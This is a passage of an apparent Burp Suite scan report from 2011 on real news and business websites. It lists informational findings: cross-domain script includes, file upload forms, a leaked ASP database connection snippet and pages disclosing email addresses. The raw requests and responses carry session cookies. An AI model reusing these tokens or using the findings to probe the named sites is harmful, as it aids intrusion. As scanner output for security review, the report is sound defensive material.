Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.897. http://www.soundingsonline.com/site-map previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/site-map

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /site-map HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.898. http://www.soundingsonline.com/subscription-services previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.899. http://www.soundingsonline.com/subscription-services/preview-current-issue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/preview-current-issue

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services/preview-current-issue HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.900. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/subscribe-to-e-newsletter

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /subscription-services/subscribe-to-e-newsletter HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2
http://platform.twitter.com/widgets.js?ver=3.0.4
http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4
http://stats.wordpress.com/e-201104.js

Request

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<link rel="pingback" href="http://www.stylemepretty.com/xmlrpc.php" />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4'></script>
<script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

18.902. http://www.zvents.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:47:10 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 35
ETag: "89f1d4056d24738faea924ba03321b72"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:47:10 GMT; HttpOnly
Content-Length: 62540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div class='ad_comp'><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.903. http://www.zvents.com/albany-ny/events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/albany-ny/events

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://www.google-analytics.com/urchin.js

Request

GET /albany-ny/events HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:47:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 27
ETag: "5408503efaf6cdf5ddfcb960970a28ab"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uew4iCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmciD0FsYmFueSwgTlkiCnN0YXRlIgdOWQ%3D%3D--51f4096067c2ce5072e1ca3c5f593268f1df8d3d; path=/; expires=Fri, 29-Apr-2011 04:47:08 GMT; HttpOnly
Content-Length: 54135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div class='ad_comp'><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19. File upload functionality previous next
There are 2 instances of this issue:

/about/contact/news_tip.bg
/sports/football/patriot_moments/

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

19.1. http://www.bostonherald.com/about/contact/news_tip.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/about/contact/news_tip.bg

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.bostonherald.com/about/contact/news_tip.bg

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

19.2. http://www.bostonherald.com/sports/football/patriot_moments/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriot_moments/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.bostonherald.com/sports/football/patriot_moments/?x=1

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

20. Database connection string disclosed previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://support.moxiesoft.com
Path:	/

Issue detail

The following database connection string was disclosed in the response:

Provider=SQLOLEDB.1;Password=

Issue background

A database connection string specifies information about a data source and the means of connecting to it. In web applications, connection strings are generally used by the application tier to connect to the back database used for storing application data. They are usually read from server-side configuration files or hard-coded into application source code.

Issue remediation

It is almost never necessary for applications to disclose database connection strings to clients. You should review the reason for the disclosure and prevent it from ever happening.

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Fri, 28 Jan 2011 14:10:59 GMT
Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/
Cache-control: private

<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId

   Set objADOConnection = Server.CreateObject("ADODB.Connection")
   sconnString = "Provider=SQLOLEDB.1;Password=" & sTalismaPwd & ";Persist Security Info=True;User ID="& sTalismaUserName & ";Initial Catalog=" & sTalismaDBName & ";Data Source=" &sTalismaServerName

   objADOConnection.Open sconnString
   Call Chec
...[SNIP]...

21. Email addresses disclosed previous next
There are 231 instances of this issue:

http://assets.nydailynews.com/js/nydn-pack-20101001.js
http://boston30.autochooser.com/results.asp
http://bostonherald.com/blogs/entertainment/the_assistant/
http://bostonherald.com/blogs/lifestyle/fork_lift/
http://bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/
http://bostonherald.com/projects/your_tax_dollars.bg
http://bostonherald.com/projects/your_tax_dollars.bg
http://bostonherald.com/sports/football/patriots/view.bg
http://bostonherald.com/track/inside_track/view.bg
http://events.cbs6albany.com/javascripts/s_code.js
http://events.cbs6albany.com/opensearch/description150.xml
http://ezsub.net/isapi/foxisapi.dll/main.sv.run
http://hosted.ap.org/static/js/prototype.js
http://jqueryui.com/about
http://support.moxiesoft.com/
http://twitter.com/LibertyHotel
http://twitter.com/ShaunieONeal
http://twitter.com/about/contact
http://twitter.com/favorites/toptweets.json
http://twitter.com/j_hollender
http://twitter.com/javascripts/widgets/widget.js
http://twitter.com/rachbarnhart
http://www.berkshireeagle.com/
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://www.bostonherald.com/about/contact/
http://www.bostonherald.com/about/home_delivery/
http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/
http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/
http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/
http://www.bostonherald.com/blogs/news/on_the_t/
http://www.bostonherald.com/business/general/view.bg
http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also
http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also
http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also
http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6
http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6
http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also
http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also
http://www.bostonherald.com/entertainment/movies/reviews/view.bg
http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2
http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2
http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also
http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also
http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also
http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also
http://www.bostonherald.com/mediacenter/
http://www.bostonherald.com/mediacenter/index.php
http://www.bostonherald.com/news/opinion/
http://www.bostonherald.com/news/politics/view.bg
http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1
http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1
http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0
http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0
http://www.bostonherald.com/news/regional/gardner_heist/
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/news/regional/view.bg
http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also
http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4
http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
http://www.bostonherald.com/projects/boston_pensions/
http://www.bostonherald.com/projects/bra/
http://www.bostonherald.com/projects/buybacks/
http://www.bostonherald.com/projects/consultants/
http://www.bostonherald.com/projects/edic/
http://www.bostonherald.com/projects/lawyer_pay/
http://www.bostonherald.com/projects/mta2008/
http://www.bostonherald.com/projects/payroll/brockton/
http://www.bostonherald.com/projects/payroll/cambridge/
http://www.bostonherald.com/projects/payroll/cca/
http://www.bostonherald.com/projects/payroll/mass_pike/
http://www.bostonherald.com/projects/payroll/quasi_state/
http://www.bostonherald.com/projects/payroll/quincy/
http://www.bostonherald.com/projects/payroll/springfield/
http://www.bostonherald.com/projects/payroll/suffolk/
http://www.bostonherald.com/projects/payroll/worcester/
http://www.bostonherald.com/projects/your_tax_dollars.bg
http://www.bostonherald.com/projects/your_tax_dollars.bg
http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also
http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also
http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also
http://www.bostonherald.com/sports/football/patriots/view.bg
http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7
http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7
http://www.bostonherald.com/store/
http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also
http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also
http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also
http://www.cbs6albany.com/
http://www.cbs6albany.com/albany-community/
http://www.cbs6albany.com/albany-tv-programming/
http://www.cbs6albany.com/albany-weather-forecast
http://www.cbs6albany.com/common/archives/
http://www.cbs6albany.com/common/tools/load.php
http://www.cbs6albany.com/search/
http://www.cbs6albany.com/sections/abouthdtv/
http://www.cbs6albany.com/sections/articles-map/
http://www.cbs6albany.com/sections/contactus/
http://www.cbs6albany.com/sections/contactus/newstips/
http://www.cbs6albany.com/sections/employmentopportunities/
http://www.cbs6albany.com/sections/jobsonline/
http://www.cbs6albany.com/sections/live-cameras/
http://www.cbs6albany.com/sections/local-news/
http://www.cbs6albany.com/sections/local-sports/
http://www.cbs6albany.com/sections/production-department/
http://www.cbs6albany.com/sections/publicfile/
http://www.cbs6albany.com/sections/rss/
http://www.cbs6albany.com/sections/sales/
http://www.cbs6albany.com/sections/satellitewaivers/
http://www.cbs6albany.com/sections/schoolclosures/
http://www.cbs6albany.com/sections/schoolwatch/
http://www.cbs6albany.com/sections/sitemap/
http://www.cbs6albany.com/sections/sp-alerts/
http://www.cbs6albany.com/sections/traffic-events/
http://www.cbs6albany.com/sections/traffic/
http://www.cbs6albany.com/sections/tvlistings/
http://www.cbs6albany.com/sections/videocopies/
http://www.cbs6albany.com/sections/weather/7day/
http://www.cbs6albany.com/sections/web-links/
http://www.cbs6albany.com/sections/wrgb-talent/
http://www.cbs6albany.com/sections/you-paid-for-it/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.moxiesoft.com/
http://www.moxiesoft.com/search.aspx
http://www.moxiesoft.com/sitemap.aspx
http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx
http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx
http://www.moxiesoft.com/solutions/spaces-solutions.aspx
http://www.moxiesoft.com/tal_about/aboutus.aspx
http://www.moxiesoft.com/tal_about/careers.aspx
http://www.moxiesoft.com/tal_about/contact.aspx
http://www.moxiesoft.com/tal_about/default.aspx
http://www.moxiesoft.com/tal_about/directors.aspx
http://www.moxiesoft.com/tal_about/legal.aspx
http://www.moxiesoft.com/tal_about/management.aspx
http://www.moxiesoft.com/tal_about/partners/default.aspx
http://www.moxiesoft.com/tal_about/terms-of-use.aspx
http://www.moxiesoft.com/tal_lp/campaign.aspx
http://www.moxiesoft.com/tal_lp/default.aspx
http://www.moxiesoft.com/tal_news/awards.aspx
http://www.moxiesoft.com/tal_news/customers.aspx
http://www.moxiesoft.com/tal_news/events-resources.aspx
http://www.moxiesoft.com/tal_news/press_release.aspx
http://www.moxiesoft.com/tal_news/press_release.aspx
http://www.moxiesoft.com/tal_news/press_room.aspx
http://www.moxiesoft.com/tal_news/webinars/default.aspx
http://www.moxiesoft.com/tal_news/webinars_events.aspx
http://www.moxiesoft.com/tal_news/webinars_recorded.aspx
http://www.moxiesoft.com/tal_products/answer.aspx
http://www.moxiesoft.com/tal_products/chat.aspx
http://www.moxiesoft.com/tal_products/chat_benefits.aspx
http://www.moxiesoft.com/tal_products/chat_tour.aspx
http://www.moxiesoft.com/tal_products/chat_tour2.aspx
http://www.moxiesoft.com/tal_products/clicktocall.aspx
http://www.moxiesoft.com/tal_products/cobrowse.aspx
http://www.moxiesoft.com/tal_products/collaboration.aspx
http://www.moxiesoft.com/tal_products/customer-spaces.aspx
http://www.moxiesoft.com/tal_products/email.aspx
http://www.moxiesoft.com/tal_products/employee-spaces.aspx
http://www.moxiesoft.com/tal_products/knowledgebase.aspx
http://www.moxiesoft.com/tal_products/phone.aspx
http://www.moxiesoft.com/tal_products/proactive_chat.aspx
http://www.moxiesoft.com/tal_products/proactivechatdemo/
http://www.moxiesoft.com/tal_products/products.aspx
http://www.moxiesoft.com/tal_products/request_demo.aspx
http://www.moxiesoft.com/tal_products/request_quote.aspx
http://www.moxiesoft.com/tal_products/social-media.aspx
http://www.moxiesoft.com/tal_resources/content.aspx
http://www.moxiesoft.com/tal_resources/resource_center.aspx
http://www.moxiesoft.com/tal_services/advisory-services.aspx
http://www.moxiesoft.com/tal_services/hosting.aspx
http://www.moxiesoft.com/tal_services/implementation.aspx
http://www.moxiesoft.com/tal_services/services.aspx
http://www.moxiesoft.com/tal_services/training.aspx
http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1
http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm
https://www.paperg.com/post.php
http://www.soundingsonline.com/
http://www.soundingsonline.com/about-us
http://www.soundingsonline.com/advertise
http://www.soundingsonline.com/archives
http://www.soundingsonline.com/boat-shop
http://www.soundingsonline.com/boat-shop/know-how
http://www.soundingsonline.com/boat-shop/new-boats
http://www.soundingsonline.com/boat-shop/new-gear
http://www.soundingsonline.com/boat-shop/on-powerboats
http://www.soundingsonline.com/boat-shop/on-sailboats
http://www.soundingsonline.com/boat-shop/q-a-a
http://www.soundingsonline.com/boat-shop/sea-savvy
http://www.soundingsonline.com/boat-shop/tech-talk
http://www.soundingsonline.com/boat-shop/used-boat-review
http://www.soundingsonline.com/calendar
http://www.soundingsonline.com/career-opportunities
http://www.soundingsonline.com/columns-blogs
http://www.soundingsonline.com/columns-blogs/bay-tripper
http://www.soundingsonline.com/columns-blogs/books
http://www.soundingsonline.com/columns-blogs/new-england-fishing
http://www.soundingsonline.com/columns-blogs/under-way
http://www.soundingsonline.com/component/chronocontact/
http://www.soundingsonline.com/component/content/article/237622
http://www.soundingsonline.com/component/yvcomment/
